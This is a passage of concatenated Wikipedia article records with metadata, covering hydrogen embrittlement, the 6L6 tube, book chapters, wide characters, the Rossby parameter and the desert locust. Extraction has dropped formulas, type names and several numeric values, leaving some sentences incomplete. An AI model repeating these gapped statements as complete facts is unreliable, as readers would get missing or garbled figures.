Plated or Coated Fasteners. While the title now explicitly includes the word fasteners, F1940 was not originally intended for these purposes. F1940 is based on the F1624 method and is similar to F519 but with different root radius and stress concentration factors. When specimens exhibit a threshold cracking of 75% of the net fracture strength, the plating bath is considered to be 'non-embrittling'. There are many other related standards for hydrogen embrittlement: NACE TM0284-2003 (NACE International) Resistance to Hydrogen-Induced Cracking ISO 11114-4:2005 (ISO)Test methods for selecting metallic materials resistant to hydrogen embrittlement. Standard Test Method for Mechanical Hydrogen Embrittlement Evaluation of Plating/Coating Processes and Service Environments Notable failures from hydrogen embrittlement In 2013, six months prior to opening, the East Span of the Oakland Bay Bridge failed during testing. Catastrophic failures occurred in shear bolts in the span, after only two weeks of service, with the failure attributed to embrittlement (see details above). In the City of London, 122 Leadenhall Street, generally known as 'the Cheesegrater', suffered from hydrogen embrittlement in steel bolts, with three bolts failing in 2014 and 2015. Most of the 3,000 bolts were replaced at a cost of £6m. See also Hydrogen analyzer Hydrogen damage Hydrogen piping Hydrogen safety Low hydrogen annealing Nascent hydrogen Oxygen-free copper Stress corrosion cracking White etching cracks Zircotec References External links Resources on hydrogen embrittlement, Cambridge University Hydrogen embrittlement Hydrogen purity plays a critical role A Sandia National Lab technical reference manual. Hydrogen embrittlement, NASA Corrosion Electrochemistry Hydrogen Materials degradation Metalworking
Hydrogen embrittlement
[ "Chemistry", "Materials_science", "Engineering" ]
4,233
[ "Metallurgy", "Materials science", "Corrosion", "Electrochemistry", "Materials degradation" ]
1,063,491
https://en.wikipedia.org/wiki/6L6
6L6 is the designator for a beam power tube introduced by Radio Corporation of America in April 1936 and marketed for application as a power amplifier for audio frequencies. The 6L6 is a beam tetrode that utilizes formation of a low potential space charge region between the anode and screen grid to return anode secondary emission electrons to the anode and offers significant performance improvements over power pentodes. The 6L6 was the first successful beam power tube marketed. In the 21st century, variants of the 6L6 are manufactured and used in some high fidelity audio amplifiers and musical instrument amplifiers. History In the UK, three engineers at EMI (Isaac Shoenberg, Cabot Bull and Sidney Rodda) had developed and filed patents in 1933 and 1934 on an output tetrode that utilized novel electrode structures to form electron beams to create a dense space charge region between the anode and screen grid to return anode secondary electrons to the anode. The new tube offered improved performance compared to a similar power pentode and was introduced at the Physical and Optical Societies' Exhibition in January 1935 as the Marconi N40. Around one thousand of the N40 output tetrodes were produced, but MOV (Marconi-Osram Valve) company, under the joint ownership of EMI and GEC, considered the design too difficult to manufacture due to the need for good alignment of the grid wires. As MOV had a design-share agreement with RCA of America, the design was passed to that company. The metal tube technology utilized for the 6L6 had been developed by General Electric and introduced in April 1935, with RCA manufacturing the metal envelope tubes for GE at that time. Some of the advantages of metal tube construction over glass envelope tubes were smaller size, ruggedness, electromagnetic shielding and smaller interelectrode capacitance. The 6L6 incorporated an octal base, which had been introduced with the GE metal tubes. The 6L6 was rated for 3.5 watts screen power dissipation and 24 watts combined plate and screen dissipation. The 6L6 and variants of it became popular for use in public address amplifiers, musical instrument amplifiers, radio frequency applications and audio stages of radio transmitters. The 6L6 family has had one of the longest active lifetimes of any electronic component, more than 80 years. As of 2021, variants of the 6L6 are manufactured in Russia, China, and Slovakia. Variations The voltage and power ratings of the 6L6 series were gradually pushed upwards by such features as thicker plates, grids of larger diameter wire, grid cooling fins, ultra-black plate coatings and low loss materials for the base. Variants of the 6L6 included the 6L6G, 6L6GX, 6L6GA, 6L6GAY, 6L6GB, 5932/6L6WGA and the 6L6GC. All variants after the original 6L6 utilized glass envelopes. A "W" in the descriptor identified the tube as designed to withstand greater vibration and impact. A "Y" in the descriptor indicated that the insulating material of the base was Micanol. Application The high transconductance and high plate resistance of the 6L6 requires circuit design that incorporates topologies and components that smooth out the frequency response, suppress voltage transients and prevent spurious oscillation. Characteristics Improved substitute 5881 Similar tubes 6P3S (6П3С) 6P3S-E (6П3С-E) 7027a 6BG6 See also 6V6 KT66 KT88 6550 6CA7 EL34 List of vacuum tubes References External links TDSL Tube data [6L6] Electron Tube Data sheets: Several 6L6 datasheets from various manufacturers Reviews of 6L6 tubes Vacuum tubes Guitar amplification tubes Telecommunications-related introductions in 1936
6L6
[ "Physics" ]
808
[ "Vacuum tubes", "Vacuum", "Matter" ]
1,063,495
https://en.wikipedia.org/wiki/Chapter%20%28books%29
A chapter (capitula in Latin; sommaires in French) is any of the main thematic divisions within a writing of relative length, such as a book of prose, poetry, or law. A book with chapters (not to be confused with the chapter book) may have multiple chapters that respectively comprise discrete topics or themes. In each case, chapters can be numbered, titled, or both. An example of a chapter that has become well known is "Down the Rabbit-Hole", which is the first chapter from Alice's Adventures in Wonderland. History of chapter titles Many ancient books had neither word divisions nor chapter divisions. In ancient Greek texts, some manuscripts began to add summaries and make them into tables of contents with numbers, but the titles did not appear in the text, only their numbers. Some time in the fifth century CE, the practice of dividing books into chapters began. Jerome (d. 420) is said to use the term capitulum to refer to numbered chapter headings and index capitulorum to refer to tables of contents. Augustine did not divide his major works into chapters, but in the early sixth century Eugippius did.  Medieval manuscripts often had no titles, only numbers in the text and a few words, often in red, following the number. Chapter structure Many novels of great length have chapters. Non-fiction books, especially those used for reference, almost always have chapters for ease of navigation. In these works, chapters are often subdivided into sections. Larger works with a lot of chapters often group them in several 'parts' as the main subdivision of the book. The chapters of reference works are almost always listed in a table of contents. Novels sometimes use a table of contents, but not always. If chapters are used they are normally numbered sequentially; they may also have titles, and in a few cases an epigraph or prefatory quotation. In older novels it was a common practice to summarise the content of each chapter in the table of contents and/or in the beginning of the chapter. Unusual numbering schemes In works of fiction, authors sometimes number their chapters eccentrically, often as a metafictional statement. For example: Seiobo There Below by László Krasznahorkai has chapters numbered according to the Fibonacci sequence. The Curious Incident of the Dog in the Night-Time by Mark Haddon only has chapters which are prime numbers. At Swim-Two-Birds by Flann O'Brien has only one chapter: the first page is titled Chapter 1, but there are no further chapter divisions. God, A Users' Guide by Seán Moncrieff is chaptered backwards (i.e., the first chapter is chapter 20 and the last is chapter 1). The novel The Running Man by Stephen King also uses a similar chapter numbering scheme. Every novel in the series A Series of Unfortunate Events by Lemony Snicket has thirteen chapters, except the final instalment (The End), which has a fourteenth chapter formatted as its own novel. Mammoth by John Varley has the chapters ordered chronologically from the point of view of a non-time-traveler, but, as most of the characters travel through time, this leads to the chapters defying the conventional order. Ulysses by James Joyce has its 18 chapters labelled as episodes, with 3 books split between them. Book-like In ancient civilizations, books were often in the form of papyrus or parchment scrolls, which contained about the same amount of text as a typical chapter in a modern book. This is the reason chapters in recent reproductions and translations of works of these periods are often presented as "Book 1", "Book 2" etc. In the early printed era, long works were often published in multiple volumes, such as the Victorian triple decker novel, each divided into numerous chapters. Modern omnibus reprints will often retain the volume divisions. In some cases the chapters will be numbered consecutively all the way through, such that "Book 2" might begin with "Chapter 9", but in other cases the numbering might reset after each part (i.e., "Book 2, Chapter 1"). Even though the practice of dividing novels into separate volumes is rare in modern publishing, many authors still structure their works into "Books" or "Parts" and then subdivide them into chapters. A notable example of this is The Lord of the Rings which consists of six "books", each with a recognizable part of the story, although it is usually published in three volumes. Literature Nicholas Dames: The Chapter: A Segmented History from Antiquity to the Twenty-First Century. Princeton University Press 2023. See also Asterism (typography) Chapter book Chapters and verses of the Bible Index (publishing) Section (typography) Table of contents References Book design Book terminology Components of intellectual works Narrative units
Chapter (books)
[ "Technology", "Engineering" ]
1,000
[ "Components of intellectual works", "Book design", "Design", "Components" ]
1,063,614
https://en.wikipedia.org/wiki/Wide%20character
A wide character is a computer character datatype that generally has a size greater than the traditional 8-bit character. The increased datatype size allows for the use of larger coded character sets. History During the 1960s, mainframe and mini-computer manufacturers began to standardize around the 8-bit byte as their smallest datatype. The 7-bit ASCII character set became the industry standard method for encoding alphanumeric characters for teletype machines and computer terminals. The extra bit was used for parity, to ensure the integrity of data storage and transmission. As a result, the 8-bit byte became the de facto datatype for computer systems storing ASCII characters in memory. Later, computer manufacturers began to make use of the spare bit to extend the ASCII character set beyond its limited set of English alphabet characters. 8-bit extensions such as IBM code page 37, PETSCII and ISO 8859 became commonplace, offering terminal support for Greek, Cyrillic, and many others. However, such extensions were still limited in that they were region specific and often could not be used in tandem. Special conversion routines had to be used to convert from one character set to another, often resulting in destructive translation when no equivalent character existed in the target set. In 1989, the International Organization for Standardization began work on the Universal Character Set (UCS), a multilingual character set that could be encoded using either a 16-bit (2-byte) or 32-bit (4-byte) value. These larger values required the use of a datatype larger than 8-bits to store the new character values in memory. Thus the term wide character was used to differentiate them from traditional 8-bit character datatypes. Relation to UCS and Unicode A wide character refers to the size of the datatype in memory. It does not state how each value in a character set is defined. Those values are instead defined using character sets, with UCS and Unicode simply being two common character sets that encode more characters than an 8-bit wide numeric value (255 total) would allow. Relation to multibyte characters Just as earlier data transmission systems suffered from the lack of an 8-bit clean data path, modern transmission systems often lack support for 16-bit or 32-bit data paths for character data. This has led to character encoding systems such as UTF-8 that can use multiple bytes to encode a value that is too large for a single 8-bit symbol. The C standard distinguishes between multibyte encodings of characters, which use a fixed or variable number of bytes to represent each character (primarily used in source code and external files), from wide characters, which are run-time representations of characters in single objects (typically, greater than 8 bits). Size of a wide character Early adoption of UCS-2 ("Unicode 1.0") led to common use of UTF-16 in a number of platforms, most notably Microsoft Windows, .NET and Java. In these systems, it is common to have a "wide character" ( in C/C++; in Java) type of 16-bits. These types do not always map directly to one "character", as surrogate pairs are required to store the full range of Unicode (1996, Unicode 2.0). Unix-like generally use a 32-bit to fit the 21-bit Unicode code point, as C90 prescribed. The size of a wide character type does not dictate what kind of text encodings a system can process, as conversions are available. (Old conversion code commonly overlook surrogates, however.) The historical circumstances of their adoption does also decide what types of encoding they prefer. A system influenced by Unicode 1.0, such as Windows, tends to mainly use "wide strings" made out of wide character units. Other systems such as the Unix-likes, however, tend to retain the 8-bit "narrow string" convention, using a multibyte encoding (almost universally UTF-8) to handle "wide" characters. Programming specifics C/C++ The C and C++ standard libraries include a number of facilities for dealing with wide characters and strings composed of them. The wide characters are defined using datatype wchar_t, which in the original C90 standard was defined as "an integral type whose range of values can represent distinct codes for all members of the largest extended character set specified among the supported locales" (ISO 9899:1990 §4.1.5) Both C and C++ introduced fixed-size character types char16_t and char32_t in the 2011 revisions of their respective standards to provide unambiguous representation of 16-bit and 32-bit Unicode transformation formats, leaving wchar_t implementation-defined. The ISO/IEC 10646:2003 Unicode standard 4.0 says that: "The width of wchar_t is compiler-specific and can be as small as 8 bits. Consequently, programs that need to be portable across any C or C++ compiler should not use wchar_t for storing Unicode text. The wchar_t type is intended for storing compiler-defined wide characters, which may be Unicode characters in some compilers." Python According to Python 2.7's documentation, the language sometimes uses wchar_t as the basis for its character type Py_UNICODE. It depends on whether wchar_t is "compatible with the chosen Python Unicode build variant" on that system. This distinction has been deprecated since Python 3.3, which introduced a flexibly-sized UCS1/2/4 storage for strings and formally aliased to wchar_t. Since Python 3.12 use of wchar_t, i.e. the Py_UNICODE typedef, for Python strings (wstr in implementation) has been dropped and still as before an "UTF-8 representation is created on demand and cached in the Unicode object." References External links The Unicode Standard, Version 4.0 - online edition C Wide Character Functions @ Java2S Java Unicode Functions @ Java2S Multibyte (3) Man Page @ FreeBSD.org Multibyte and Wide Characters @ Microsoft Developer Network Windows Character Sets @ Microsoft Developer Network Unicode and Character Set Programming Reference @ Microsoft Developer Network Keep multibyte character support simple @ EuroBSDCon, Beograd, September 25, 2016 Character encoding C (programming language) C++
Wide character
[ "Technology" ]
1,336
[ "Natural language and computing", "Character encoding" ]
1,063,654
https://en.wikipedia.org/wiki/Rossby%20parameter
The Rossby parameter (or simply beta ) is a number used in geophysics and meteorology which arises due to the meridional variation of the Coriolis force caused by the spherical shape of the Earth. It is important in the generation of Rossby waves. The Rossby parameter is given by where is the Coriolis parameter, is the latitude, is the angular speed of the Earth's rotation, and is the mean radius of the Earth. Although both involve Coriolis effects, the Rossby parameter describes the variation of the effects with latitude (hence the latitudinal derivative), and should not be confused with the Rossby number. See also Beta plane References Atmospheric dynamics
Rossby parameter
[ "Chemistry" ]
144
[ "Atmospheric dynamics", "Fluid dynamics" ]
1,063,671
https://en.wikipedia.org/wiki/Desert%20locust
The desert locust (Schistocerca gregaria) is a species of locust, a periodically swarming, short-horned grasshopper in the family Acrididae. They are found primarily in the deserts and dry areas of northern and eastern Africa, Arabia, and southwest Asia. During population surge years, they may extend north into parts of Southern Europe, south into Eastern Africa, and east in northern India. The desert locust shows periodic changes in its body form and can change in response to environmental conditions, over several generations, from a solitary, shorter-winged, highly fecund, non-migratory form to a gregarious, long-winged, and migratory phase in which they may travel long distances into new areas. In some years, they may thus form locust plagues, invading new areas, where they may consume all vegetation including crops, and at other times, they may live unnoticed in small numbers. During plague years, desert locusts can cause widespread damage to crops, as they are highly mobile and feed on large quantities of any kind of green vegetation, including crops, pasture, and fodder. A typical swarm can be made up of and fly in the direction of the prevailing wind, up to in one day. Even a very small, locust swarm can eat the same amount of food in a day as about 35,000 people. As an international transboundary pest that threatens agricultural production and livelihoods in many countries in Africa, the Near East, and southwest Asia, their populations have been routinely monitored through a collaborative effort between countries and the United Nations Food and Agriculture Organization (FAO) Desert Locust Information Service (DLIS), which provides global and national assessments, forecasts, and early warning to affected countries and the international community. The desert locust's migratory nature and capacity for rapid population growth present major challenges for control, particularly in remote semiarid areas, which characterize much of their range. Locusts differ from other grasshoppers in their ability to change from a solitary living form into gregarious, highly mobile, adult swarms and hopper bands, as their numbers and densities increase. They exist in different states known as recessions (with low and intermediate numbers), rising to local outbreaks and regional upsurges with increasingly high densities, to plagues consisting of numerous swarms. They have two to five generations per year. The desert locust risk increases with a one-to-two-year continuum of favourable weather (greater frequency of rains) and habitats that support population increases leading to upsurges and plagues. The desert locust is potentially the most dangerous of the locust pests because of the ability of swarms to fly rapidly across great distances. The major desert locust upsurge in 2004–05 caused significant crop losses in West Africa and diminished food security in the region. The 2019–2021 upsurge caused similar losses in northeast Africa, the Near East, and southwest Asia. Taxonomy The desert locust is a species of orthopteran in the family Acrididae, subfamily Cyrtacanthacridinae. There are two subspecies, one called Schistocerca gregaria gregaria, the better known and of huge economic importance, located north of the equator, and the other, Schistocerca gregaria flaviventris, which has a smaller range in south-west Africa and is of less economic importance, although outbreaks have been observed in the past. Description The genus Schistocerca consists of more than 30 species, distributed in Africa, Asia, and North and South America, and many species are difficult to identify due to the presence of variable morphs. It is the only genus within the Cyrtacanthacridinae that occurs in both the New and Old World. Most species have the fastigium deflexed and lack lateral carinae on the pronotum. The hind tibiae have smooth margins with numerous spines, but have no apical spine on the outer margin. The second tarsal segment is half as long as the first. Males in the genus have broad anal cerci and a split subgenital plate. The genus is thought to have originated in Africa and then speciated in the New World after a dispersal event that took place 6 to 7 million years ago. The morphology and colour of Schistocerca gregaria differ depending on whether individuals are solitary (or solitaria morph) or gregarious(or gregaria morph). Morphology - Adults: solitary female 6-9 cm long; male 4.5-6 cm; gregarious female 5-6 cm long; male 4.5-5 cm. Prosternal tubercle straight, blunt and slightly sloping backwards. Male subgenital plate bilobed, cerci flat and blunt. Elytra marked with large irregular spots. Pronotum not crested, narrower and saddle-shaped in the gregarious phase. The eyes are striated. The number of striae increases after each moult. Striations are only clearly visible in solitary individuals. Coloration - Nymph: Solitary nymphs are greenish or pale beige and may go through six instars. Gregarious nymphs are typically yellow, with a black head and pronotum, black lateral stripes on the abdomen and pass through five instars. First instar gregarious nymphs are almost entirely black. Adults: Immature solitary adults are sandy, pale grey or beige in colour; this colouration evolves to pale yellow in mature male adults and to pale beige with brown patterns in mature females. Immature gregarious adults are pink/reddish in colour, changing to bright yellow in mature males; in mature females the yellow is less bright, mainly on the upper parts of the body, with the lower parts being more of a pale beige. The hindwings are transparent or light yellow. Lifecycle The lifecycle of the desert locust consists of three stages, the egg, the nymph known as a hopper, and the winged adult. Copulation takes place when a mature male hops onto the back of a mature female and grips her body with his legs. Sperm is transferred from the tip of his abdomen to the tip of hers, where it is stored. The process takes several hours and one insemination is sufficient for a number of batches of eggs. The female locust then seeks suitable soft soil in which to lay her eggs. It needs to be the right temperature and degree of dampness and be in close proximity to other egg-laying females. She probes the soil with her abdomen and digs a hole into which an egg pod containing up to 100 eggs is deposited. The egg pod is long and the lower end is about below the surface of the ground. The eggs are surrounded by foam and this hardens into a membrane and plugs the hole above the egg pod. The eggs absorb moisture from the surrounding soil. The incubation period before the eggs hatch may be two weeks, or much longer, depending on the temperature. The newly hatched nymph soon begins to feed, and if it is a gregarious individual, is attracted to other hoppers and they group together. As it grows, it needs to moult (shed its exoskeleton). Its hard cuticle splits and its body expands, while the new exoskeleton is still soft. The stages between moulting are called instars and the desert locust nymph undergoes five moults before becoming a winged adult. Immature and mature individuals in the gregarious phase form bands that feed, bask, and move as cohesive units, while solitary-phase individuals do not seek conspecifics. After the imaginal moult, the young adult is initially soft with drooping wings, but within a few days, the cuticle hardens and haemolymph is pumped into the wings, stiffening them. Maturation can occur in 2–4 weeks when the food supply and weather conditions are suitable but may take as long as 6 months when they are less ideal. Males start maturing first and give off an odour that stimulates maturation in the females. On maturing, the insects turn yellow and the abdomens of the females start swelling with developing eggs. Ecology and swarming Desert locusts have a solitary phase and a gregarious phase, a type of polyphenism. Solitary locusts nymphs and adults can behave gregariously within a few hours of being placed in a crowded situation, while gregarious locusts need one or more generations to become solitary when reared in isolation. Differences in morphology and behaviour are seen between the two phases. In the solitary phase, the hoppers do not group together into bands but move about independently. Their colouring in the later instars tends to be greenish or brownish to match the colour of their surrounding vegetation. The adults fly at night and are also coloured so as to blend into their surroundings, the immature adults being grey or beige and the mature adults being a pale yellowish colour. In the gregarious phase, the hoppers bunch together and in the later instars develop a bold colouring with black markings on a yellow background. The immatures are pink and the mature adults are bright yellow and fly during the day in dense swarms. The change from an innocuous solitary insect to a voracious gregarious one normally follows a period of drought, when rain falls and vegetation flushes occur in major desert locust breeding locations. The population builds up rapidly and the competition for food increases. As hoppers get more crowded, the close physical contact causes the insects' hind legs to bump against one another. This stimulus triggers a cascade of metabolic and behavioral changes that causes the insects to transform from the solitary to the gregarious phase. When the hoppers become gregarious, their colouration changes from largely green to yellow and black, and the adults change from brown to pink (immature) or yellow (mature). Their bodies become shorter, and they give off a pheromone that causes them to be attracted to each other, enhancing hopper band and subsequently swarm formation. The nymphal pheromone is different from the adult one. When exposed to the adult pheromone, hoppers become confused and disoriented, because they can apparently no longer "smell" each other, though the visual and tactile stimuli remain. After a few days, the hopper bands disintegrate and those that escape predation become solitary again. During quiet periods, called recessions, desert locusts are confined to a belt that extends from Mauritania through the Sahara Desert in northern Africa, across the Arabian Peninsula, and into northwest India. Under optimal ecological and climatic conditions, several successive generations can occur, causing swarms to form and invade countries on all sides of the recession area, as far north as Spain and Russia, as far south as Nigeria and Kenya, and as far east as India and southwest Asia. As many as 60 countries can be affected within an area of , or about 20% of the Earth's land surface. Locust swarms fly with the wind at roughly the speed of the wind. They can cover from in a day, and fly up to about above sea level (the temperature becomes too cold at higher altitudes). Therefore, swarms cannot cross tall mountain ranges such as the Atlas, the Hindu Kush, or the Himalayas. They do not venture into the rain forests of Africa nor into central Europe. However, locust adults and swarms regularly cross the Red Sea between Africa and the Arabian Peninsula, and are even reported to have crossed the Atlantic Ocean from Africa to the Caribbean in 10 days during the 1987–89 plague. A single swarm can cover up to and can contain between (a total of around 50 to 100 billion locusts per swarm, representing , considering an average mass of 2 g per locust). The locust can live between 3 and 6 months, and a 10- to 16-fold increase in locust numbers occurs from one generation to the next. Impacts of the desert locust Economic impact The desert locust is probably the oldest and most dangerous migratory pest in the world. The scale of the invasions and destruction they cause is due to their exceptional gregarious nature, their mobility, the voracity and size of their hopper bands and swarms. Desert locust invasions can be absolutely devastating and have serious repercussions on national and regional food security and on the livelihoods of affected rural communities, particularly the poorest. Added to this damage is the cost of control operations implemented to protect crops, which also help to stop the spread of the invasion, which could otherwise continue for many years and over larger areas. Furthermore, the damage is not limited to crops, but must also include the multiple social and environmental consequences of invasions, which are now better understood and taken into account, even if they are difficult to estimate. Desert locusts consume an estimated equivalent of their body weight () each day in green vegetation. They are polyphagous and feed on leaves, shoots, flowers, fruit, seeds, stems, and bark. Nearly all crops and noncrop plants are eaten, including pearl millet, maize, sorghum, barley, rice, pasture grasses, sugarcane, cotton, fruit trees, date palms, banana plants, vegetables, and weeds. Crop loss from locusts was noted in the Bible and Qur'an; these insects have been documented as contributing to the severity of a number of Ethiopian famines. Since the early 20th century, desert locust plagues occurred in 1926–1934, 1940–1948, 1949–1963, 1967–1969, 1987–1989, 2003–2005, and 2019–2020. In March–October 1915, a plague of locusts stripped Ottoman Palestine of almost all vegetation. The significant crop loss caused by swarming desert locusts exacerbates problems of food shortage, and is a threat to food security. Environmental impact Desert locust control still relies mainly on chemical pesticides. In the event of an invasion, control operations are of such magnitude that the products used can have serious side effects on human health, the environment, non-target organisms and biodiversity. These side effects are increasingly well known. Correct application of the preventive strategy recommended by the FAO and the use of good treatment practices that are more respectful of people and the environment can limit the negative impacts of these large-scale sprayings. Social impact The external social costs to the local human population during desert locust outbreaks can be enormous, but difficult to estimate. Crop and pasture losses can lead to severe food shortages and a large imbalance in food rations, large price fluctuations in markets, insufficient availability of grazing areas, the sale of animals at very low prices to meet household subsistence needs and to buy feed for remaining animals, early transhumance of herds and high tensions between transhumant herders and local farmers, and significant human migration to urban areas (sometimes fatal for the elderly, the weak and young children). Other economic consequences can occur during harvest, as cereals can be contaminated with insect parts and downgraded to feed grains that are sold at a lower price. In addition, the negative income shock can have a long-term impact on the educational outcomes of children living in rural areas. Beneficial impact The potential benefits of locust swarms are seldom acknowledged. However, locusts are not all bad, as the biomass of locust individuals contributes greatly to ecosystem processes in case of an invasion. Locust frass and cadavers are rich in nutrients which are transferred to the soil via decomposition by micro-organisms and fungi, absorbed by plants, increasing net ecosystem productivity and ecosystem nutrient cycling through rapid mineralization rates of nitrogen and carbon. Early warning and preventive control Early warning and preventive control is the strategy adopted by locust-affected countries in Africa and Asia to try to stop locust plagues from developing and spreading. In the 1920s-1930s, locust control became a major field for international cooperation. The International Agricultural Institute developed several programmes aimed at exchanging data about the desert locust and international conferences were held in the 1930s: Rome in 1931, Paris in 1932, London in 1934, Cairo in 1936, and Brussels in 1938. Colonial empires were heavily involved in these attempts to control locust pests, which affected heavily the Middle East and parts of Africa. The USSR also used locust control as a way to expand its influence in the Middle East and Central Asia. FAO's Desert Locust Information Service (DLIS) in Rome monitors the weather, ecological conditions, and the locust situation on a daily basis. DLIS receives results of survey and control operations carried out by national teams in affected countries. The teams use a variety of innovative digital devices, such as eLocust3, to collect, record and transmit standardized data in real-time to their national locust centres for decision-making. This data is automatically integrated into SWARMS, the global monitoring and early warning system operated by DLIS. Within this system, the field data are combined with the latest satellite imagery to actively monitor rainfall, vegetation and soil moisture conditions in the locust breeding area from West Africa to India. This is supplemented by sub-seasonal and seasonal temperature and rainfall predictions up to six months in advance as well as other weather forecasts and data from NOAA and ECMWF. Models are used to estimate egg and hopper development rates and swarm trajectories (NOAA HYSPLIT) and dispersion (UK Met Office NAME). DLIS uses a custom GIS to analyze the field data, satellite imagery, weather predictions and model results to assess the current situation and forecast the timing, scale, and location of breeding and migration up to six weeks in advance. The situation assessments and forecasts are published in monthly locust bulletins that date back to the 1970s. These are supplemented by warnings and alerts to affected countries and the international community. This information is available on the FAO Locust Watch website. DLIS continuously adopts the latest technologies as innovative tools, including drones, to improve monitoring and early warning. FAO also provides information and training to affected countries and coordinates funding from donor agencies in case of major upsurges and plagues. The desert locust is a difficult pest to control, and control measures are further compounded by the large and often remote areas () where locusts can be found. Undeveloped basic infrastructure in some affected countries, limited resources for locust monitoring and control, and political turmoil within and between affected countries further reduce the capacity of a country to undertake the necessary monitoring and control activities. At present, the primary method of controlling desert locust infestations is with insecticides applied in small, concentrated doses by vehicle-mounted and aerial sprayers at ultra-low volume rates of application. The insecticide is acquired by the insect directly, meaning that control must be precise. Control is undertaken by government agencies in locust-affected countries or by specialized regional aerial organizations such as the Desert Locust Control Organization for East Africa (DLCO-EA). The desert locust has natural enemies such as predatory wasps and flies, parasitoid wasps, predatory beetle larvae, birds, and reptiles. These may be effective at keeping solitary populations in check but are of limited effects against gregarious desert locusts because of the enormous numbers of insects in the swarms and hopper bands. Farmers often try mechanical means of killing locusts, such as digging trenches and burying hopper bands, but this is very labour-intensive and is difficult to undertake when large infestations are scattered over a wide area. Farmers also try to scare locust swarms away from their fields by making noise, burning tires, or other methods. This tends to shift the problem to neighbouring farms, and locust swarms can easily return to reinfest previously visited fields. Biopesticides Biopesticides include fungi, bacteria, neem extract, and pheromones. The effectiveness of many biopesticides equals that of conventional chemical pesticides, but two distinct differences exist. Biopesticides in general take longer to kill insects, plant diseases, or weeds, usually between 2 and 10 days. The two types of biopesticides are biochemical and microbial. Biochemical pesticides are similar to naturally occurring chemicals and are nontoxic, such as insect pheromones used to locate mates, while microbial biopesticides, come from bacteria, fungi, algae, or viruses that either occur naturally or are genetically altered. Entomopathogenic fungi generally suppress pests by mycosis - causing a disease that is specific to the insect. Biological control products have been under development since the late 1990s; Green Muscle and NOVACRID are based on a naturally occurring entomopathogenic fungus, Metarhizium acridum. Species of Metarhizium are widespread throughout the world, infecting many groups of insects, but pose low risk to humans, other mammals, and birds. The species M. acridum has specialised in short-horned grasshoppers, to which these locusts belong, so has been chosen as the active ingredient of the product. The product is available in Australia under the name Green Guard and in Africa, it used to be available as Green Muscle. However, since Green Muscle seems to have disappeared from the market, another product, NOVACRID, was developed for Africa, Central Asia, and the Middle East. These products are applied in the same way as chemical insecticides, but do not kill as quickly. At recommended doses, the fungus can take up to two weeks to kill up to 90% of the locusts. For that reason, it is recommended for use mainly against hoppers, the wingless early stages of locusts. These are mostly found in the desert, far from cropping areas, where the delay in death does not result in damage. The advantage of the product is that it affects only grasshoppers and locusts, which makes it much safer than chemical insecticides. Specifically, it allows the natural enemies of locusts and grasshoppers to continue preying upon them. These include birds, parasitoid and predatory wasps, parasitoid flies, and certain species of beetles. Though natural enemies cannot prevent plagues, they can limit the frequency of outbreaks and contribute to their control. Biopesticides are also safer to use in environmentally sensitive areas such as national parks or near rivers and other water bodies. Green Muscle was developed under the LUBILOSA programme, which was initiated in 1989 in response to environmental concerns over the heavy use of chemical insecticides to control locusts and grasshoppers during the 1987-89 plague. The project focused on the use of beneficial disease-causing microorganisms (pathogens) as biological control agents for grasshoppers and locusts. These insects were considered too mobile and too fecund for their numbers to be curbed by classical biological control. Pathogens bear a distinct advantage in that many can be produced in artificial culture in large quantities and be used with ubiquitous spraying equipment. Entomopathogenic fungi were traditionally regarded as needing humid conditions to be effective. However, the LUBILOSA programme devised a method to overcome this by spraying fungal spores in an oil formulation. Even under desert conditions, Green Muscle can be used to kill locusts and other acridid pests, such as the Senegalese grasshopper. During trials in Algeria and Mauritania in 2005 and 2006, various natural enemies, but especially birds, were abundant enough to eliminate treated hopper bands in about a week, because the diseased hoppers became sluggish and easy to catch. Desert locust plagues and upsurges In the 1900s, there were six major desert locust plagues, one of which lasted almost 13years. 1915 Ottoman Syria locust infestation From March to October 1915, swarms of locusts stripped areas in and around Palestine, Mount Lebanon and Syria of almost all vegetation. This infestation seriously compromised the already-depleted food supply of the region and sharpened the misery of all Jerusalemites. 1960s to present Since the early 1960s, there have been two desert locust plagues (1967-1968 and 1986-1989) and six desert locust upsurges (1972-1974, 1992-1994, 1994-1996, 2004-2005, 1996-1998, and 2019-2021). 2004–2005 upsurge (West Africa) From October 2003 to May 2005, West Africa faced the largest and most numerous desert locust infestations in 15 years. The upsurge started as small, independent outbreaks that developed in Mauritania, Mali, Niger, and Sudan in the autumn of 2003. Two days of unusually heavy rains that stretched from Dakar, Senegal, to Morocco in October allowed breeding conditions to remain favourable for the next 6 months and the desert locusts rapidly increased. Lack of rain and cold temperatures in the winter breeding area of northwest Africa in early 2005 slowed the development of the locusts and allowed the locust control agencies to stop the cycle. During the upsurge, nearly were treated by ground and aerial operations in 23 countries. The costs of fighting this upsurge have been estimated by the FAO to have exceeded US$400 million, and harvest losses were valued at up to US$2.5 billion, which had disastrous effects on food security in West Africa. The countries affected by the 2004-2005 upsurge were Algeria, Burkina Faso, the Canary Islands, Cape Verde, Chad, Egypt, Ethiopia, the Gambia, Greece, Guinea, Guinea Bissau, Israel, Jordan, Lebanon, Libyan Arab Jamahiriya, Mali, Mauritania, Morocco, Niger, Saudi Arabia, Senegal, Sudan, Syria, and Tunisia. 2019–2021 desert locust upsurge In May 2018, Cyclone Mekunu brought unprecedented rainfall to the Empty Quarter of the Arabian Peninsula that was followed by Cyclone Luban that brought heavy rains again to the same area in October. This allowed conditions to be favourable for three generations of breeding, which caused an estimated 8,000-fold increase in Desert Locust numbers that went unchecked because the area was so remote it could not be accessed by national locust teams. In early 2019, waves of swarms migrated from this remote and inaccessible area north to the interior of Saudi Arabia and southern Iran, and southwest to the interior of Yemen. Both areas received good rains, including heavy flooding in southwest Iran (the worst in 50 years), that allowed another two generations of breeding to take place. While control operations were mounted against the northern movement and subsequent breeding, very little could be done in Yemen due to the ongoing conflict. As a result, new swarms formed that crossed the southern Red Sea and the Gulf of Aden and invaded the Horn of Africa, specifically northeast Ethiopia and northern Somalia in June 2019. Again, good rains allowed further breeding during the summer, followed by another generation of widespread breeding during the autumn in eastern Ethiopia and central Somalia, which was exacerbated by the unusually late occurring Cyclone Pawan in northeast Somalia in early December. The swarms that subsequently formed invaded Kenya in late December 2019 and spread throughout the country where they bred in between the rainy seasons because of unusual rainfall. Kenya had only witnessed swarm invasions twice in the past 75 years (1955 and 2007). Some swarms also invaded Uganda, South Sudan, Tanzania and one small swarm reached northeast D.R. Congo, the first time since 1945. The situation improved in Kenya and elsewhere by the summer of 2020 due to large-scale aerial control operations, made available by generous assistance from international partners. Nevertheless, food security and livelihoods were impacted throughout the region. Despite the control efforts, good rains continued to fall and breeding occurred again during the summer and autumn in 